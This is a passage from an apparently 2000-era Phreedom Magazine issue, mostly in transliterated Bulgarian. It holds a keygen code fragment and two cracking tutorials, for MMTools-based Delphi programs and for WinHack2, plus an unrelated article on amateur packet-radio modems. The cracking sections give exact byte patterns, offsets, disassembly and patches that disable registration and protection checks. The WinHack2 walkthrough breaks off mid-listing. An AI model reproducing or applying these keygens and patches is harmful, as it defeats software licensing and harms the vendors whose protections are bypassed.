if (ac[0] == 'w' && ac[1] == 'w' &&
ac[2] == 'w' && ac[3] == '.') ac+=4;
len = strlen(ac);
for (c=0;c<len;c+=2) evensum += ac[c];
for (c=1;c<len;c+=2) oddsum += ac[c];
int mod7 = len % 7;
int mod3 = len % 3;
for(c=0;c<len;c++) {
if(ac[c] >= 48 && ac[c] <= 57)
ac[c] = ROT(ac[c], mod7, 48, 57);
else
if(ac[c] >= 65 && ac[c] <= 90)
ac[c] = ROT(ac[c], mod7, 65, 90);
else
if(ac[c] >= 97 && ac[c] <= 122)
ac[c] = ROT(ac[c], mod7, 97, 122);
else
if(ac[c] == 45)
ac[c] = 46;
else
if(ac[c] == 46)
ac[c] = 45;
if((mod7 = mod7 + mod3) > 7)
mod7 = 1;
}
sprintf(&ac[c], "%04d%04d", evensum, oddsum);
for (i=0;i<4;i++) ac[c++]+=52;
for (i=0;i<4;i++) ac[c++]+=55;
bedit->Text = ac;
return;
}
Tozi Borland C++ Builder kod chete domaina ot komponenta aedit,
izchislqwa regcoda i go pokazwa w bedit.
Towa e wsichko.
Solar Eclipse
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Cracking MMTools By DaFixer
........... . . . . . . . . . . . . . .
Tova e pismoto mi do "xavier" s objasnenija kak da se kraknat programite
polzvashti MMTools (komponenti za Delphi). Ne sum znael che pichovete po
sveta ot meseci se borili da crack-nat tova :)
MMTools programite iskat MMKey32.dll za da vurvjat bez pusnato Delphi. E
az si napisah moj sobsven MMKey32.dll exportvasht kakvoto trjabva. S WinAPI
sniffer vidjah imenata na procedurite, no tjah gi ima i hardcode-nati.
Programata za kojato stava vupros tuk njama da namerite, no tova njama
znachenie, ponezhe e opisan univeralen algoritum za crackvane na vsichki
programi polzvashti MMTools.
V posledstvie se okaza che za Delphi5 i Delphi3 njakoi patterns sa
razlichni. Problema go reshihme kato tursihm stringovete 'shrink0', sled
tova obrushtame Phys adresa v RVA. i nakraja si generirame pattern-a
dinamichno. Toj e mov edx, RVA_ADRESA. Sled t ova na 11 ili 12 byte-a na zad
se patchva 74h s EBh.
Eto i samoto pismo:
Hi xavier this is my reaserch:
1) Enable your error displays with patching physical offset: 5560
from FF2570B24500 to 909090909090. The mm initialization code
sets error mode to zero !!! So if something happened you don't
know what is it! This operation is just to help us crack this
babe :)
1.1) I also changed string resurces in exe. As I told you yesterday
some strings can be found on two different offsets. So I change
Their names to: IDE1not found, IDE2Notfound, Initialization1error
and Initialization2error. Now I will know where the code flows.
(My Delphi is installed on the NT and I don't want to install
SoftIce over NT. My Win95 and FAT is full with games and there is
no space for Delphi there :)) )
2) Remove IDE check patching physcal offset: 48AF5 from 74 to EB.
(This operation is necessary for the crack. This offset can be
easily found in general from nearby staying string )
The HALT procedure is located at RVA 403808. It is called from
* Referenced by a CALL at Addresses:
|:00449011 , :00449137 , :0044919A , :004494F7 , :0044971B
|:00449D65 , :00449E25 , :00449EC7 , :0044CC22 , :0044CD44
|:0044CDB7 , :0044CFD7 , :0044EB37 , :0044ED03 , :0044EE4C
|:0044EEBF , :0044FA6E , :0044FE88 , :0044FFBE , :00450031
|:00451C53 , :00451D24 , :00451E4E , :00451EC1 , :00458128
|
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040392E(U)
|
:00403808 53 push ebx
I think only the unconditional jump reference from 0040392E must
exists and that all calls are from the protection shema.
3) Build stupid mmkey32.dll
(This is necessary for the crack)
!!!!!!! Strange but only with this patches your program starts some
!!!!!!! times. Like the case with the org mmkey32.dll ver 5.0. But
!!!!!!! may be with org version the app have stared more often ...
!!!!!!! And the other strange thing is that your app have started
!!!!!!! after "Initialization failed" message .... :))) I think I'm
!!!!!!! near ....
4) After I check *ALL* the addresses that calls exit procedure,
I think this procedure is Halt(0), I've found the next
groups of calls:
A) Call when Delphi is not active, or somthing other Delphi related
- from 00449011
here should be patched the proc that checks for Delphi at 00448F5C.
:00449001 E856FFFFFF call 00448F5C :00449006 84C0 test al, al
:00449008 7407 je 00449011
because it can be located easyly ...
locate 81C4F8FEFFFF6805010000 and change first 3 bytes
to B0FFC3 (mov al,FF ; ret)
B) After compare of some address to 00009C40 if not greater then exit
- from 00449137
- from 0044CD44
- from 0044EE4C
- from 0044FFBE
- from 00451E4E
:00449124 33C0 xor eax, eax
:00449126 A3D09B4500 mov dword ptr [00459BD0], eax
:0044912B 813DD09B4500409C0000 cmp dword ptr [00459BD0], 00009C40
:00449135 7D05 jge 0044913C
(but how this will be greater.
ofcourse if s.o. else write meth.
at 00459BD0)
:00449137 E8CCA6FBFF call 00403808
these can be located by: 409C00007D05
and patched to : 409C0000EB05
C) At the end of Library loading. I think these are shrinker related
- from 0044919A
- from 0044CDB7
- from 0044EEBF
- from 00450031
- from 00451EC1
**0044919A -> (If loaded library proc addresses are not
like the hardcoded)
:0044918E 813DCC9B450031347D0A cmp dword ptr [00459BCC], 0A7D3431
:00449198 7405 je 0044919F
:0044919A E869A6FBFF call 00403808
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00449180(C), :0044918C(C), :00449198(C)
|
:0044919F 803DB4A8450000 cmp byte ptr [0045A8B4], 00
:004491A6 751D jne 004491C5
* Possible StringData Ref from Code Obj ->"shrink0"
|
:004491A8 BA30924400 mov edx, 00449230
these should be patched. May be they are the only one that
should be patched :)) I'm not sure yet ... I think these checks
are for proc addresses of imported procs. and they are hardcoded.
So these can be located by: 813831347D0A7405
and should be patched to : 813831347D0AEB05
Note: I also think that here should be found the algorithm of
decompressing shrinked procs. But I don't care. I'll crack
the exe.
D) After unsuccessfull calls to mmxxx32.dll proc
- from 0044CC22
- from 0044CFD7
- from 0044EB37
- from 0044ED03
- from 0044FA6E
- from 0044FE88
- from 00451C53
- from 00451D24
:0044CBFF FFD0 call eax
(this might be a call to any
mmkey32.dll proc)
:0044CC01 8B15909C4500 mov edx, dword ptr [00459C90]
:0044CC07 8902 mov dword ptr [edx], eax
:0044CC09 A1909C4500 mov eax, dword ptr [00459C90]
:0044CC0E 833800 cmp dword ptr [eax], 00000000
:0044CC11 740F je 0044CC22
these can be located by: 8902A1909C4500833800740F
and patched to : 8902A1909C45008338009090
E) Exit, called after "Bad Boy" message dialog, or after an error
- from 004494F7 - Unable to load library
- from 0044971B - IDE not found 1
- from 00449D65 - IDE not found 2
- from 00449E25 - Evaluation Expired
these should not be patched
F) The only normal one - at the end of application
- from 00458128
this should not be patched :))))))))
G) Other ...
- from 00449EC7, there are some winmm.dll calls
I don't know. I'll not patch this at this moment
So ... after all this patches and with my silly MMKey32.DLL your
program manage to start 20 times from 20 attempts !!!!!
I think mmtools protection is a history now .... :)))
So now is 00:49 local time and I'll start to work over smart patcher
that will detect and correct MMTools proggies.
DaFixer
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Wireless/Packet Modems By ADA
........... . . . . . . . . . . . . . .
Ot tazi statiq shte poluchite informaciq otnosno edin nachin za
predavane na danni, koito ne e dosta izvesten na shirokata publika.
1) Istoriq
Prez 1979 grupa Kanadski radioliubiteli (HAMs) izpolzvali radiostanciite
si edin vid ne po standartno prednaznachenie. S pomoshtta na samorychno
izmisleno i napraveno ot tqh ustrojstvo, koeto te narichat TNC (Terminal
Node Connector), te osyshtestvqvat cifrova vryzka megdu terminali. Tova e
bilo opredelen napredyk v sravnenie s RTTY (radio teletype), koito bili
izpolzvani dotogava (te se izpolzvat i sega za syztezaniq ili v egednevieto,
no sa otstypili mqsto na Packet-a). Sigurno se chudite kakvo e tova
Packet-a, tova e vsyshtnost imeto na komunikaciqta, osyshtestvqvana s TNC i
TX/RX (radiostanciq). Pylnoto mu nazvanie e Packet-Radio. Ideqta za tozi vid
komunikaciq dopada na mnogo HAM-ove, koito sa po natura hora experimentatori
i duhyt ot butilkata e veche na svoboda. Prez mart 1980 se dava
razreshenie na US HAM-ove da probvat ASCII komunikaciq po bezgichen kanal.
Zapochvat razrabotki i se osyshtestvqvat podobreni versii na TNC, a imenno
TNC2,3 i 4 (vsyshtnost te sa poveche firmware popravki otkolkoto shemni). V
US byrzo eizgradena mrega ot ednoto krajbregie do drugo, chrez koqto
radioliubitelite sa mogli (a i v momenta mogat) da osyshtesvqvat cifrova
komunikaciq na golemi razstoqniq.
2) Ustrojstva
TNC-to e obiknovenno edna kutiq, v koqto sa razpologeni platkite
realizirashti shemite. Ima i ROM s firmware, kojto e syrceto na TNC-to.
Ima i PAD (Packet Assembler-Disassembler). Kogato po seriiniqt interfejs na
kompiytura ili terminala (obiknovenno RS232) se izpratqt dannu, to PAD gi
kapsulira taka che te da mogat da bydat predadeni chrez diskretni signali
izpolzvajki radiovylni. Za tazi cel se izpolzvat kakto i v obiknovennite
modemi (modulator-demodulator) shemi za modulirane. I tuk raznoobrazieto na
modulacii e golqmo i zavisi glavno ot prilogenieto. TNC-to ili packet modema
v povecheto sluchai se vkliuchvat v gnezdoto kydeto na radiostanciqta se
svyrzva vynshen mikrofon (mike). Tozi nachin na svyrzvane mnogo prilicha na
onezi modemi, koito sa se polzvali predi mnogo godini po sveta, a i u nas
pri koito slushalkata na telefona se e postavqla vyrhu modema, kojto e imal
mikrofon i govoritelche (imashe navremeto edin film kydeto vidqh kak
izglegda tva chudo - razbira se potrebitelq beshe hacker - v dneshniqt losh
smisyl na dumata). Vruzkata e galvanichna. Dopulnitelno ima i izvod, kojto
kontrolira momentite na predavane/priemane - t.e. edin vid natiska kopcheto
za predavane, kogato predava, i go otpuska sled tova.
Taka opisana vryzkata izpolzva AFSK (Audio Frequency Shift Keying)
modulaciq. Tazi modulaciq se poluchava kato se izpolzvat dva osnovni tona s
tochno opredeleni chestoti (mislq che ediniqt e s chestota 2100Hz).
Maximalnata skorost e 2400bps. Tazi skorost za segashnite standarti e niska,
no radioliubitelite ne sa hishtni hieni za bandwith i download, te izpolzvat
packet-a v povecheto sluchai taka, kakto navremeto se izpolzvaha 2400
modemite (kogato bqha vyrhova tehnologiq) u nas - za vryzka s BBS-u i
chetene na poshta. Zapochvam da si mislq che BBS-te nqma da umrat prosto
shte se transformirat malko. Razbira se vyzmogni sa i po-visoki skorosti na
transfer, primerno 9600bps izpolzvajki FSK modulaciq. Obache s pokachvaneto
na skorostta vyznikvat dosta problemi. Eto nqkoj ot tqh:
1) Signalyt ot izhoda na mikrofona e usilen i sledovatelno deformiran
(poglednete napisanato ot LudPhreak v statiqta ot phm#21).
2) Obiknovennite radiostancii imat dosta golqmo vreme na latentnost, ili
na po-prost ezik: pri 2400kbps PushToTalk buttona ne e tolkova inerten
za da syzdava problemi, no pri 9600+ toj veche e. Stava taka che vremeto
za prehod OnAir->OffAir i obratno e golqmo.
Eto zashto pri 9600+ se nalaga dorabotka na radiostanciqta, koeto e po
silite na nqkoi, no ne na vsichki. Osobeno ne po silite na pishlemetata
deto imat klas D i kesqt na 144MHZ(2m) vse e edno che e IRC i kato pochnat
da drynkat gluposti kato v #bulgaria i zadrystvat po syshtiqt nachin efira.
Uspokoenie e che imat legalno pravo da predavat samo na 2m. A sega obratno
na temata: v posledno vreme povecheto proizvoditeli na radiostancii slagat
lepenki che tehnite modeli mogat da osystestvqvat komunikaciq na 9600 bez
aparatni promeni, no dokolkoto sym chel tova ne e dokraj istina i HAM-ovete
ne sa ostanali bez tozi problem(za dorabotkata na TX/RX-a).
Trqbva da spomena che Packetarstvo obiknovenno ima na UKV obhvata tuj
kato na nego se postiga neobhodimata chistota na signala. Obqsnenieto e:
obiknovenno industrialnite shumove, koito sa v efira sa amplitudni i te ne
vliqqt na signal predavan chrez chestotna modulaciq - FM (tuj kato tam
amplitudata moge da byde ogranichavana v receiver-a). Ne taka stoi vyprosa
pri komunikaciq s amplitudna modulaciq - AM, tuk idva problema sys
shumovete, koito se naslagvat i syzdavat problemi. Taka syshto i AM se
izpozlva obiknovenno dosta rqdko i samo za DX (dalechni vryzki) na chestoti
pod 28MHz, kato tova opredelq tipichnata skorost za DX packetarsvo ot 300bps
(pak dobre che ne e 75bps). BTW, spomnqm si che v edin ot starite broeve na
PHREEDOM imashe predlogenie da se NETstva na chugda telefona smetka s AM
predavatel ako ne iskash da te gepqt sys gicite pri kutiqta. Za smetka na
sigurnostta e kofti vryzkata. Pod UKV trqbva da razbirate razreshenite za
HAM-ove chestoti ot tozi obhvat : 144MHZ(2m), 444MHZ(70cm), 1.2GHZ 5GHZ,
10GHZ (moge da sym propusnal nqkoq chestota).
Trqbva da se otbelegi che kolkoto po-visoka e chestotata na predavane,
tolkova po-visoka skorost moge da se postigne. Da ne govorim che v obhvatite
nad 1GHz rahreshenata chestotna oblast se izmerva v stotici MHz dokato za 2m
tq e 2Mhz(kydeto se blyskat dosta vidove komunikaciq). Syshto taka s
povishavaneto na chestotata iziskvaniqta za moshtnost na predvatelq ne sa
golemi i dori moshtnostti 1W ili 0.5W zaedno s podhodqshti anteni davat
otlichni rezultati (imajte predvid che za DX trqbvat desetki i stotici W),
no vse pak za 10GHz anteniete sa nasocheni edna kym druga za namalqvane na
zagubite v sredata. Za primer bih dal Slovenskite HAM-ove S5xxx. Te oshte
prez 1995/96 zavyrshvat razrabotkata na ustrojstva, koito izpolzvani
syvmetno pozvolqvat skorosti ot 1.2Mbs. Radiostanciite sa WideBandFM - tqhna
razrabotka(tvyrdo se pravqt samo za packet). Osobenoto na tezi stancii e v
tova, che te sa lakomi za chestotna oblast, no tova ne im prechi da rabotqt
na blizki chestoti s obiknovenni RX/TX za glasova komunikaciq. Poslednite
prosto ne se otpushvat i ne im se vliqe. Imam svedeniq dori i za po-visoki
skorosti ot tazi - 10Mbs, a proekta mislq che beshe EthernetOnAir. Tam se
raboti na 10GHZ ili poveche, a tezi chestoti ne sa za podcenqvane ot
fiziologichna gledna tochka vypreki che nqkoj kazvat che e bezvredno poradi
malkata moshtnost. Microvylnovite furni rabotqt na okolo 2.6GHz i ne sa
bezopasni, no te sa sys golqma moshtnost.
Zabelegitelno ili ne trqbva da se kage che s buma na proizdotelnostta na
syvremennite kompiutru e dori vyzmogno da se pravi packet-vryzka i bez TNC
ili Packet-modem. Za celta trqbva da imate zvukova karta (koj li nqma vche
pokraj .mp3) i sravnitelno byrz kompityr (e ne kato za DVD)- minimuma e
486/66 i smqtam che povecheto dneshni mashini go pokrivat tozi minimum :).
DSP-to na kartata se grigi da pravi tova, koeto pravi PAD-a pri TNC-to.
Malyk problem e kontrola na PushToTalk buttona, kojto moge da se reshi po
nqkolko nachina, primerno chrez izpozlvane na paralelniqt port (ako e
svoboden) ili chrez port-a na MIDI/Joystick, kojto povecheto hora ne
polzvat, a i skoro i ot nego i smisyl nqma da ima - nali idva nedonoscheto
USB, vmesto IEEE1394 (FireWire). Mdaaa prosto iNtel ima povche pari i
vliqnie ot Apple. Kogato se izpolzva kompiutyr, a ne terminal, e vyzmogna
rabotata ne sys skypo TNC, a sys evtin Packet Modem. Posledniqt obache
iziskva specializiran software i driver-i dokato TNC-to e chisto seriino
ustrojstvo. Razlikata megdu dvete ustrojstva e kato megdu obiknoven modem i
software-en modem. Pri packet modema kapsulaciqta se pravi v kompiutyra(v
segashno vreme dostatycno byrzo, dori prekaleno) i sled tova gotovata za
izprashtane informaciq se podava na packet modema. TNC-to samo si kapsulira
dannite. Edin vid poglednato(to po-princip si e taka) packet modema e
systavna chast na TNC-to.
Obikovenno packet modemite sa G3RUH syvmestimi. G3RUH e napravil modem,
kym syvmestimost s kojto pochti vsichki se stremqt (pisha pochti vsichki
zashtoto Slovencite sa primer za takiva hora. Te izpolzvat modifikaciq na
Manchester modem ot 2400 za da vdignat do 78k4 - pone mislq che tolkova
beshe). Dori edin 9k6 modem napraven po shemata na G3RUH moge da se
"overclockne"(kakto e moderno sega da se kazva) i na po-visoki skorosti,
prosto trqbva da smenqt nqkoj elementi. Modifikaciqta e napravena ot samiq
G3RUH taka che nqma problemi. Maj se overclockvashe do 64kbp/s, ako ne e do
64 togava e do 56kbp/s.
Packet modemite ili naj-obshto bezgichnite modemi moga da sa ot golqma
polza tam kydeto kabel ne moge da se prekara, pyk satelita e dostopochtenno
skyp. Primer za tova sa spomenatite ot EXo v phm#21 Wireless modemi na firma
DSM- Rousse. Spored specifikaciqta dyrgat potok do 920kbp/s, pri prqka
vidimost na 60 kilometra bez povtoritel. Da ne kaga che spored dochutata ot
men cena ot $400 za 2 modema i router(izrichnoto iskam da kaga che taka sym
nauchil ot staff na phreedom), na web site-a nqma cenova lista. Spored men
dori i opredeleni gradski usloviq ne sa problem (no ne razbira se mnogo
sgradi). Rabotqt na 10GHz. Spored S5 tehnite modemi s 1W pokrivat 100km
prqka vidimost.
Trqbva da se znae che TNC moge da raboti v DIGIPEATERen regim, t.e.
navyrzani nqkolko BBS-a mogat da dadat vyzmognost bez prqka vryzka na HAM ot
Sofia da stigne do Varna, no trqbva razbira se da se otchitat syotvetnite
zakysneniq i po-golqmata vyzmognost za zaguba na packeti pri poveche
hop-ove. Edno TNC v digi regim moge da poddyrga nqkolko ednovremenni vryzki
kym negoviqt BBS i navyn. Edno PC moge da ima slogeni nqkolko modema ili
TNC-ta, kato se izpolzva karta za razshirenie PI ili podobrenata PI2, koqto
ima i analozi (v Sloveniq). PI2 kartata e neshto kato kartite, koito polzvat
povecheto bylgarski ISP-ta za da si nakachat modemite kym Dial-Up server-a
(digiBoard naprimer). Tq iziskva sobstveno DMA(za IRQ ne sym siguren).
Navremeto se e prodavala kato KIT, t.e. napravi si sam. Obache ot nqkolko
godini ne e vyzmogno chovek da si nabavi takyv KIT - toj prosto ne se
proizvegda. Za smetka na tova firma PacComm vyrti zdrava tyrgoviq s TNC-ta i
PI2 syvmestimi platki (qki pari dyrpat).
Radioliubitelqt LZ1DDD e chast ot grupa za razrabotka i e golqm
privyrgenik na FlexNet. Toj pravi v momenta PCI karta s packet modem,
pozvolqvasht skorosti do 76k8, i radiostanciq v edno, koeto e edno dosta
dobro reshenie. Takyv vid karta, no ISA prodava MiroSystems Varna (ne pravq
reklama na nikogo prosto davam primeri). Poslednata e s shto gode tvyrd
obhvat - mislq che polzva kvarcove, hmm to bez kvarcove nakyde. Cenata e
okolo $100. Nqma bezuprechen vynshen vid, no raboti. BTW ako nqkoj ima
problemi s praveneto na PIC programator moge da si kupite ot nego platka s
pisti na koqto da si nalepite vishcki elementi. Na web stranicata na LZ1DDD
(www.qsl.net/lz1ddd/) ima dadena shemata na malyk(s golemina, kolkoto 2
kibrita) packet modem.
3) Software
Kanalniqt protokol, vyrhu kojto raboti packet-a e AX.25. Tova e
vidoizmenen X.25, vyv vryzka s tova che informaciqta se predava chrez
radio vylni, no i ne samo zaradi tova. W nachaloto e bil izpolzvan za dostyp
do golemi mashini(IBM) ot terminali i po tozi nachin se e poluchavala
vyzmognost za rabota s centralizirana izchislitelna mosht. AX.25 ne e slab,
no razbira se znaete che TCP/IP e po izvesten i povsemestno izpolzvan.
HAM-ovete osven che sa "gelezari", pishat i programi, ta dori celi
OS-ove(programi) (malki) za nugdite na packet predavaneto - naprimer JNOS
(naj-populqren), TNOS. Pyrvo e bila napisana NET, posle se vidozmenq do NOS.
Poslednata ima mnogo modifikacii, dve ot koito spomenah.
S shirokoto navlizane na Linux i golqmata podkrepa, koqto ima tazi OS
dovede do tova, che tq napulno poddyrga AX.25 (kakto i mnogo drugi
protokoli za predavane na danni). Vsichko e prosto, kompilirate qdroto s
poddrygka na AX.25 i tova e v po-golqmata chast, ostanalata si q znaete -
nastrojki 'route' i drugi(za poveche informaciq AX_25.howto). Problemyt e
drug: rabotata s AX.25 e trudna i neproizvoditelna. Zatova pone zasega za
Windows, moge bi v bydeshte i za Linux ima realizaciq na TCP/IP stack nad
AX.25(t.e pak AX.25 stack) s koeto neshtata si idvat na mqstoto. S packet
modem i BBS s Internet vryzka veche moge da ne zavisish ot BTK pone za
pretochvane na malko kolichestvo poshta ili chat v nenatovareni IRC
kanali, a dori i ICQ. A i tozi TCP/IP stack e dosta stabilen. Po-stabilen ot
tozi na Windows-a. Naricha se FlexNet(www.flexnet.de) i e syzdaden ot
germanci. FlexNet e bil syzdaden zashtoto syshtesvuvashtite realizacii na
komunikaciq megdu AX.25 i prilogeniqta e hostmode-a na WA8DED, no posledniqt
e:baven, truden za izpolzvane ot programistite, ne e prozrachen (ne moge da
izpolzvate TCP/IP s nego). FlexNet e revolucionen produkt, a ne evolucionen.
Toj se installira taka kakto si slagate M$ TCP/IP protokol - ot Control
Panel. Za poveche informaciq vigte na web site-a. BTW na germanci
prinadlezhi "standart-a" za packet modemi (dokolkoto moge da ima standart)
ili po-tochno kazano po-chesto srestanata izrabotka.
Na praktika vseki moge da si sglobi i dori da si izmisli modem, samo
trqbva da ima dylboki poznaniq po shemotehnika (osobeno cifrova) i takiva
hora ima. Za pochti vsichki OS-i ima packet BBS-i. Dori edin packet BBS moge
da byde izpolzvan za izlaz kym Internet(tova ne e mnogo chudno). Povecheto
ot tqh sa dostypni ot Internet (chrez telnet naprimer). Prosto pri logvane
trqbva da izpolzvate inicial. Bylgarskite iniciali sa ot: vida LZxYYY,
kydeto x e cifra, a YYY bukvi. Razbira se ima i iniciali s 2 bukvi, te sa na
stari HAM-ove. Spored chetnostta/nechetnostta na X zavisi kyde givee HAM-a,
dali v Severna ili IUgna Bulgaria. Ako nikoga ne ste bili v daden BBS toj vi
dava vyzmoznost da si izberete parola, kato taka syzdavaneto na account-a
obshto vzeto svyrshva. Povecheto ot BBS-ite sa v domain-a ampr.org. Za
nugdite na ampr.org e predostaven Class A mrega ot IP adresi 44.XXX.YYY.ZZZ.
Na Bulgaria e otdelena Class B mrega (44.185/16). Iskam specialno da kaga
che amerikancite pak sa se uredili zashtoto tam vseki shtat e s Class B
mrega ili gradove imat sobstvena, za smetka na tova ima strani s Class C
mregi(stranite ot bivshiqt USSR).
4) Zakliuchenie
Kato zakliuchenie iskam da kaga che Wireless/Packet modemite sa hubavo
neshto, no edin problem ostava, che te sa dostatychno slogni za sredniq, a i
pod sredniq kompiturgiq, kojto lesno se nauchava kak da byzikne WinXXYY (dve
X i 2 Y hromozomi :) ), no nqma da moge da napravi modema. A pyk fabrichno
toj idva na dosta pochtenna cena. Nadqvam se che vi e bilo interesno. Ako
vyzniknat nqkakvi vyprosi, pitajte na msg.boarda i sigurno shte vi byde
otgovoreno.
zZzZzzzzZZZZZZZZ ..... v tishinata se chuva slabo BreadFan.
ADA
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Cracking WinHack2 By DaFixer
........... . . . . . . . . . . . . . .
Target:
WinHack2.exe (456 192 bytes, 16.05.1999 , 19:50:14)
http://www.malinverni.com/download/down.asp?program=WH200.zip
Tools:
shrunp.exe - Deshrinker by Andrew Shipinsky
http://156.17.4.138/~mwd/playtools/exe-ud.html
DeDe (c) by DaFixer
http://www.phreedom.org/ftparea/windows/DeDe/
RegMon
http://www.sysinternals.com/regmon.htm
FileMon
http://www.sysinternals.com/filemon.htm
W32DASM
Your favorite HEX editor (i.e. HEXWorkShop)
Znachi tova s vuprosnija WinHack 2.0 opredeleno me zaintreguva i reshih
da proverja za kakvo stava vupros. Sled kato svalih i installnah bebcheto,
purvata rabota beshe da proverja kak sa byte-chetata v exe-to :) Otvorih si
Winhack2.exe s HWS (HexWorkShop) i kakvo da vidja! Okaza che bebcheto e leko
cryptirano s shrinker. E neka da koregirame tazi rabota. Purvo razbirase
opitah da go dumpna s ProcDump, no to se opuna. Sled tova da go decriptiram
pak s ProcDump, no to pak se opuna. Nakraja mi pisna i prosto izpolzvah
dobrija star "shrunp". Toj ne pokaza uslozhnenija.
Sled novata proverka na byte-chetata, kakvo da vidja: Boolean .. False i
t.n. He he ljubimoto mi - Delphi programka. Tova samo poveche me nasturvi da
ja operiram i otstranja bugchetata i.
Nakraja go pusnah! Njamashe nag screen-ove. (mozhe bi tova vi otegchava,
no naistina za pruv put puskam tazi programka!). Ta otkrih az menuto
Register i go clicknah. Ta izkochi ShowMessage() kazvasht che moja serien
nomer bil #$%&-#$@$%@@. Dobre. Posle obache izkochi edno InputQuery()
pitashto za reg nomera. E slozhih neshto za reg nomer. Sled OK-a obache se
iznenadah. Pochti si misleh che bebcheto e izlugano kogato vmesto "This
#$%%$%^^ is invalid" puluchih message-a che trjabvalo da si restartna
WinHack-a. Hmmm .... neshtata maj njama da sa lesni.
E neka da proverim kak izglezhda bebcheto bez gashti :) Purvo go
dasm-nah s W32DASM a posle si pusnah i DeDe-to. Vmesto tova mozhe da
polzvate dakazhem exe2drp (ako ste go cracknali), no DeDe ima po-golemi
vuzmozhnosti. Ta sled kato si otvorih izgeneriranija ot DeDe Delphi work
space purvo mi napravi vpechatlenie che ednata ot formite ne ja vidjah v
programata. Tja beshe za registracija. Maj momchetata deto sa pravil
bebcheto sa si smenili protection shemata. Sled tova zabeljazah i drugi
interesni neshta kato naprimer TExeImage clasa. Hmm ... No tova za koeto si
otvorih project-a be da razbera RVA-to na onova menu. E to imalo handler s
ime MM_Help_RegisterClick i se pomeshtavalo na adres 0048991C. Osven tova si
zapisah i Form1.OnCreate adresa: 00481144. Neka da vidim za kakvo stava
vupros:
(tova e malko sled nachaloto na TForm1.OnCreate)
:0048116C A158D34800 mov eax, dword ptr [0048D358]
:00481171 E8B628F8FF call 00403A2C
:00481176 8B8670020000 mov eax, dword ptr [esi+00000270]
:0048117C E83342FFFF call 004753B4
:00481181 84C0 test al, al
:00481183 741F je 004811A4
* Possible StringData Ref from Code Obj ->"Created By: YourName Here"
|
:00481185 BAE8134800 mov edx, 004813E8
:0048118A 8B8640050000 mov eax, dword ptr [esi+00000540]
:00481190 E89FD7F9FF call 0041E934
:00481195 B201 mov dl, 01
:00481197 8B8640050000 mov eax, dword ptr [esi+00000540]
:0048119D E8FAD6F9FF call 0041E89C
:004811A2 EB1D jmp 004811C1
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00481183(C)
|
* Possible StringData Ref from Code Obj
->"Created By: Unregistered version "
->"of WinHack v2.00"
|
:004811A4 BA0C144800 mov edx, 0048140C
Chudja se kakvo li pravi tazi procedurka na 004753B4. Imajki predvid
String Reference-ite maj originalnoto i ime e neshto ot sorta na:
function IsThisABadGuy()
a kato ja poglednah! uzhas! 15 reference-a:
* Referenced by a CALL at Addresses:
|:0048117C , :00484458 , :0048733A , :0048751E , :00487875
|:00487B6C , :00487F3C , :004880BC , :0048969E , :004899BF
|:004899F2 , :00489B5C , :00489BA1 , :00489E3F , :00489E67
|
:004753B4 55 push ebp
Kato se scrollnah nadolu se okaza che tova zhivotno e baja golemichko. E
naj-nakraja mu stignah do kraja:
:0047574F 8BC3 mov eax, ebx
:00475751 5F pop edi
:00475752 5E pop esi
:00475753 5B pop ebx
:00475754 8BE5 mov esp, ebp
:00475756 5D pop ebp
:00475757 C3 ret
:0047574F 8BC3 mov eax, ebx
E, zashto trjabva da ostavjame na 0047574F v eax da se puhat razni
neznajni stojnosti, kato ebx naprimer, kato mozhe da puhnem edna da rechem
-1-ka, kato otgovorim tvurdo na IsThisABadGuy? s False :)
E neka zamenim: B8C3 mov eax, ebx
S tova: B0FF mov al, FF
Sega da vidim bebcheto. Kato go pusnem se zabeljazva che veche register
menu-to go njama. Sushto taka se zabeljazva che bebcheto izchezva v
nebitieto sled okolo 3 sec. Maj neshto ne mu dopada da mu smenjame
byte-chetata :)) E maj e vreme da poshpionstvame veche ... Ta neka si pusnem
shpionskite rogramki: RegMon i FileMon na NT Internals. Tova koeto se
zabeljazva v REG povedenieto mu e che tursi njakakvi si :
HKLM\Software\Microsoft\ActiveObject\{486E6957-766B6361-20303032}\
{74793433-33746833-33326834-39386E76-2020742D} NOTFOUND
HKLM\Software\Microsoft\ActiveObject\{486E6957-766B6361-20303032}\
{57505934-54383445-792D796E-79353477} NOTFOUND
A v FILE povedenieto mu se zabeljazvat oshte po-stranni neshta: Minat se
neminat 4 sec i se pishe na C:\ njakakuv si m.dmp. e dobre, tova mozhe da e
svurzano sus specifikite na samata programa v krajna smetka. Interesnoto e
che versijata sus smenenite bytecheta izdurzha samo do purvoto pisane v
m.dmp i pri tova sama si napravi dump tam :) no mako razburkano go pravi.
Sled proverka na string reference- ite kum m.dmp se okaza che edinstvenata
procedura v kojato m.dmp e reference-nato 2 puti ima adres 004743AC i se
vika ot slednite 2 mesta:
* Referenced by a CALL at Addresses:
|:00472DD2 , :00473B9C
|
:004743AC 55 push ebp
Purvoto ot tjah e :
:00472D9C 53 push ebx
:00472D9D 56 push esi
:00472D9E BE087A4D00 mov esi, 004D7A08
:00472DA3 C605FC794D0000 mov byte ptr [004D79FC], 00
:00472DAA C605047A4D0001 mov byte ptr [004D7A04], 01
:00472DB1 EB40 jmp 00472DF3
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472DFA(C)
|
:00472DB3 C605187A4D0001 mov byte ptr [004D7A18], 01
:00472DBA 830601 add dword ptr [esi], 00000001
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472D52(C)
|
:00472DBD 7105 jno 00472DC4
:00472DBF E86000F9FF call 00402E24
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472DBD(C)
|
:00472DC4 833E09 cmp dword ptr [esi], 00000009
:00472DC7 7C20 jl 00472DE9
:00472DC9 33C0 xor eax, eax
:00472DCB 8906 mov dword ptr [esi], eax
:00472DCD BBDCCC4800 mov ebx, 0048CCDC
:00472DD2 E8D5150000 call 004743AC
:00472DD7 3B03 cmp eax, dword ptr [ebx]
:00472DD9 740E je 00472DE9
:00472DDB C605FC794D0001 mov byte ptr [004D79FC], 01
:00472DE2 C605057A4D0001 mov byte ptr [004D7A05], 01
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
